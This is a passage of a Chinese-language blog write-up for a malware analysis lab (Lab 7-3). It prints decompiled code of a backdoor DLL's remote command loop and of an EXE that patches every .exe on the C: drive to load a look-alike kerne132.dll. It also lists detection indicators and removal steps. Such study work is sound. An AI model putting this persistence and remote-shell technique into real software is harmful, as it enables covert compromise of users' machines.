<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( recv(v3, &amp;buf, <span class="number">4096</span>, <span class="number">0</span>) &gt; <span class="number">0</span> )</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> ( !<span class="built_in">strncmp</span>(Str1, &amp;buf, <span class="number">5u</span>) )<span class="comment">//Str1="sleep"</span></span><br><span class="line">    &#123;</span><br><span class="line">        Sleep(<span class="number">0x60000</span>u);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> ( !<span class="built_in">strncmp</span>(aExec, &amp;buf, <span class="number">4u</span>) )<span class="comment">//aExec="exec"</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">memset</span>(&amp;StartupInfo, <span class="number">0</span>, <span class="keyword">sizeof</span>(StartupInfo));</span><br><span class="line">        StartupInfo.cb = <span class="number">68</span>;</span><br><span class="line">        CreateProcessA(<span class="number">0</span>, &amp;CommandLine, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0x8000000</span>u, <span class="number">0</span>, <span class="number">0</span>, &amp;StartupInfo, &amp;ProcessInformation);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ( buf == <span class="string">'q'</span> )</span><br><span class="line">        &#123;</span><br><span class="line">        CloseHandle(hObject);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        Sleep(<span class="number">0x60000</span>u);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="分析exe"><a href="#分析exe" class="headerlink" title="分析exe"></a>分析exe</h3><p>程序的正常执行需要在执行时附加一个参数”WARNING_THIS_WILL_DESTROY_YOUR_MACHINE”：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( argc == <span class="number">2</span> &amp;&amp; !<span class="built_in">strcmp</span>(argv[<span class="number">1</span>], aWarningThisWil) )<span class="comment">// aWarningThisWill=WARNING_THIS_WILL_DESTROY_YOUR_MACHINE</span></span><br></pre></td></tr></table></figure>

<p>打开了C:\Windows\System32\Kernel32.dll以及Lab07-03.dll：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">v3 = CreateFileA(FileName, <span class="number">0x80000000</span>, <span class="number">1u</span>, <span class="number">0</span>, <span class="number">3u</span>, <span class="number">0</span>, <span class="number">0</span>);<span class="comment">// FileName=C:\Windows\System32\Kernel32.dll</span></span><br><span class="line">hObject = v3;</span><br><span class="line">v4 = CreateFileMappingA(v3, <span class="number">0</span>, <span class="number">2u</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">v5 = MapViewOfFile(v4, <span class="number">4u</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">v6 = v5;</span><br><span class="line">argca = v5;</span><br><span class="line">v7 = CreateFileA(ExistingFileName, <span class="number">0x10000000</span>u, <span class="number">1u</span>, <span class="number">0</span>, <span class="number">3u</span>, <span class="number">0</span>, <span class="number">0</span>);<span class="comment">// ExistingFilename=Lab07-03.dll</span></span><br><span class="line">v50 = v7;</span><br><span class="line"><span class="keyword">if</span> ( v7 == <span class="number">-1</span> )</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">0</span>);</span><br></pre></td></tr></table></figure>

<p>接下来调用sub_401040以及sub_401070：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">call</span>    sub_401040</span><br><span class="line"><span class="keyword">call</span>    sub_401040</span><br><span class="line"><span class="keyword">call</span>    sub_401040</span><br><span class="line"><span class="keyword">call</span>    sub_401040</span><br><span class="line"><span class="keyword">call</span>    sub_401040</span><br><span class="line"><span class="keyword">call</span>    sub_401070</span><br><span class="line"><span class="keyword">call</span>    sub_401040</span><br></pre></td></tr></table></figure>

<p>sub_401040和sub_401070进行了一系列的数学运算，将计算结果返回：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">sub_401040</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">int</span> a2, <span class="keyword">int</span> a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line"></span><br><span class="line">  result = sub_401000(a1, a2);</span><br><span class="line">  <span class="keyword">if</span> ( result )</span><br><span class="line">    result = a3 + a1 + *(result + <span class="number">20</span>) - *(result + <span class="number">12</span>);</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">sub_401070</span><span class="params">(<span class="keyword">unsigned</span> <span class="keyword">int</span> a1, <span class="keyword">int</span> a2, <span class="keyword">int</span> a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line"></span><br><span class="line">  result = sub_401000(a1, a2);</span><br><span class="line">  <span class="keyword">if</span> ( result )</span><br><span class="line">    result = *(result + <span class="number">12</span>) - *(result + <span class="number">20</span>) - a3;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上述的计算以及写入完成后调用了CopyFileA函数，将Lab07-03.dll中的内容复制并保存到C:\windows\system32\kerne132.dll中，拷贝失败退出：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( !CopyFileA(ExistingFileName, NewFileName, <span class="number">0</span>) )</span><br><span class="line"><span class="comment">// .data:0040307C ExistingFileName db 'Lab07-03.dll',0</span></span><br><span class="line"><span class="comment">//.data:0040304C NewFileName     db 'C:\windows\system32\kerne132.dll',0</span></span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">0</span>);</span><br></pre></td></tr></table></figure>

<p>若拷贝成功，则调用sub_4011E0(aC, 0)，这里的aC保存字符串指向的是C盘根目录下的所有文件：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">.data:</span><span class="number">00403044</span> aC              <span class="built_in">db</span> <span class="string">'C:\*'</span>,<span class="number">0</span></span><br></pre></td></tr></table></figure>

<p>sub_4011E0关键分支：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( !(FindFileData.dwFileAttributes &amp; <span class="number">0x10</span>)</span><br><span class="line">    || !<span class="built_in">strcmp</span>(FindFileData.cFileName, asc_403040)<span class="comment">//"."</span></span><br><span class="line">    || !<span class="built_in">strcmp</span>(FindFileData.cFileName, asc_40303C) )<span class="comment">//".."</span></span><br><span class="line">    &#123;</span><br><span class="line">        v6 = <span class="built_in">strlen</span>(FindFileData.cFileName) + <span class="number">1</span>;</span><br><span class="line">        v7 = <span class="built_in">malloc</span>(<span class="built_in">strlen</span>(v3) + <span class="number">1</span> + <span class="built_in">strlen</span>(FindFileData.cFileName));</span><br><span class="line">        <span class="built_in">strcpy</span>(v7, lpFileName);</span><br><span class="line">        v7[<span class="built_in">strlen</span>(lpFileName) - <span class="number">1</span>] = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">strcat</span>(v7, FindFileData.cFileName);</span><br><span class="line">        <span class="keyword">if</span> ( !stricmp(&amp;FindFileData.dwReserved0 + v6 + <span class="number">3</span>, aExe) )<span class="comment">//aExe=".exe"</span></span><br><span class="line">            sub_4010A0(v7);</span><br><span class="line">        v3 = lpFileName;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>作用是找到C:\中所有文件夹以及子文件夹中含有”.exe”的文件，然后执行sub_4010A0(v7)，v7是找到的文件名：</p>
<p>sub_4010A0是一个查找字符串的函数，即在找到的exe文件中查找某字符串。</p>
<p>在sub_4010A0的子分支中存在复制的操作：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( !stricmp(v10, Str2) )<span class="comment">//Str2="kernel32.dll"</span></span><br><span class="line">&#123;</span><br><span class="line">    qmemcpy(v10, &amp;dword_403010, <span class="built_in">strlen</span>(v10) + <span class="number">1</span>);<span class="comment">//.data:00403010 aKerne132Dll    db 'kerne132.dll',0     ; DATA XREF: sub_4010A0+EC↑o</span></span><br><span class="line">    v4 = v12;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>将kernel32.dll更改为kerne132.dll，kerne132.dll是由Lab07-03.dll拷贝而来。</p>
<p>所以，sub_4011E0函数作用为查找C:盘中所有的exe文件，将exe文件中的”kernel32.dll”改为”kerne132.dll”。</p>
<p>综上，Lab7-3.exe首先将Lab7-3.dll复制到 C:\windows\system32\kerne132.dll，然后将C:盘中的所有exe文件调用kernel32.dll 改为调用kerne132.dll，这样就简介调用了Lab07-3.dll，建立一个与远程服务器的连接，开启一个shell。</p>
<h2 id="Q2：这个恶意代码的两个明显的基于主机特征是什么？"><a href="#Q2：这个恶意代码的两个明显的基于主机特征是什么？" class="headerlink" title="Q2：这个恶意代码的两个明显的基于主机特征是什么？"></a>Q2：这个恶意代码的两个明显的基于主机特征是什么？</h2><ol>
<li>使用了一个叫kerne132.dll的文件；</li>
<li>创建一个叫SADFHUHF的互斥量：</li>
</ol>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">.text:</span><span class="number">10001041</span>                 <span class="keyword">lea</span>     <span class="built_in">edi</span>, [<span class="built_in">esp</span>+<span class="number">1208h</span>+var_FFF]</span><br><span class="line"><span class="symbol">.text:</span><span class="number">10001048</span>                 <span class="keyword">push</span>    offset Name     <span class="comment">; "SADFHUHF"</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">1000104D</span>                 <span class="keyword">rep</span> <span class="keyword">stosd</span></span><br></pre></td></tr></table></figure>

<h2 id="Q3：这个程序的目的是什么？"><a href="#Q3：这个程序的目的是什么？" class="headerlink" title="Q3：这个程序的目的是什么？"></a>Q3：这个程序的目的是什么？</h2><p>将Lab7-3.dll复制到 C:\windows\system32\kerne132.dll，然后将C:盘中的所有exe文件调用kernel32.dll 改为调用kerne132.dll，这样就间接调用了Lab07-3.dll，建立一个与远程服务器的连接，开启一个shell。</p>
<h2 id="Q4：一旦这个恶意代码被安装，你如何移除它？"><a href="#Q4：一旦这个恶意代码被安装，你如何移除它？" class="headerlink" title="Q4：一旦这个恶意代码被安装，你如何移除它？"></a>Q4：一旦这个恶意代码被安装，你如何移除它？</h2><p>无法直接移除，但是可以间接消除其影响：</p>
<ol>
<li><p>通过与sub_4011E0类似的方法，将C:盘中所有exe文件里的kerne132.dll字符串改为kernel32.dll，然后删除<br>C:\windows\system32\kerne132.dll以及C:\Windows\System32\Kernel32.dll；</p>
</li>
<li><p>删除原来的kerne132.dll，将kernel32.dll改名为kerne132.dll； </p>
</li>
<li><p>恢复系统；</p>
</li>
</ol>
<p><a href="https://bbs.pediy.com/thread-249025.htm" target="_blank" rel="noopener">Reference Documents</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/04/17/safeSEH/" rel="next" title="攻破safeSEH">
                <i class="fa fa-chevron-left"></i> 攻破safeSEH
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/04/18/safeunlink/" rel="prev" title="突破safe unlink">
                突破safe unlink <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/me.jpg"
                alt="Ivoripuion" />
            
              <p class="site-author-name" itemprop="name">Ivoripuion</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">categories</span>
                
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Lab7-1"><span class="nav-number">1.</span> <span class="nav-text">Lab7-1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Q1：当计算机重启之后，这个程序如何保证它继续运行（达到持久化驻留）"><span class="nav-number">1.1.</span> <span class="nav-text">Q1：当计算机重启之后，这个程序如何保证它继续运行（达到持久化驻留）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q2：为什么这个程序会使用一个互斥量？"><span class="nav-number">1.2.</span> <span class="nav-text">Q2：为什么这个程序会使用一个互斥量？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q3：可以用来检测这个程序的基于主机特征是什么？"><span class="nav-number">1.3.</span> <span class="nav-text">Q3：可以用来检测这个程序的基于主机特征是什么？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q4：检测这个恶意代码的基于网络特征是什么？"><span class="nav-number">1.4.</span> <span class="nav-text">Q4：检测这个恶意代码的基于网络特征是什么？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q5：这个程序的目的是什么？"><span class="nav-number">1.5.</span> <span class="nav-text">Q5：这个程序的目的是什么？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q6：这个程序什么时候完成执行？"><span class="nav-number">1.6.</span> <span class="nav-text">Q6：这个程序什么时候完成执行？</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Lab7-2"><span class="nav-number">2.</span> <span class="nav-text">Lab7-2</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Q1：这个程序如何完成持久化驻留？"><span class="nav-number">2.1.</span> <span class="nav-text">Q1：这个程序如何完成持久化驻留？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q2：这个程序的目的是什么？"><span class="nav-number">2.2.</span> <span class="nav-text">Q2：这个程序的目的是什么？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q3：这个程序什么时候完成执行？"><span class="nav-number">2.3.</span> <span class="nav-text">Q3：这个程序什么时候完成执行？</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Lab7-3"><span class="nav-number">3.</span> <span class="nav-text">Lab7-3</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Q1：这个程序如何完成持久化驻留，来确保在计算机被重启后它能继续运行？"><span class="nav-number">3.1.</span> <span class="nav-text">Q1：这个程序如何完成持久化驻留，来确保在计算机被重启后它能继续运行？</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#分析dll"><span class="nav-number">3.1.1.</span> <span class="nav-text">分析dll</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#分析exe"><span class="nav-number">3.1.2.</span> <span class="nav-text">分析exe</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q2：这个恶意代码的两个明显的基于主机特征是什么？"><span class="nav-number">3.2.</span> <span class="nav-text">Q2：这个恶意代码的两个明显的基于主机特征是什么？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q3：这个程序的目的是什么？"><span class="nav-number">3.3.</span> <span class="nav-text">Q3：这个程序的目的是什么？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Q4：一旦这个恶意代码被安装，你如何移除它？"><span class="nav-number">3.4.</span> <span class="nav-text">Q4：一旦这个恶意代码被安装，你如何移除它？</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ivoripuion</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>
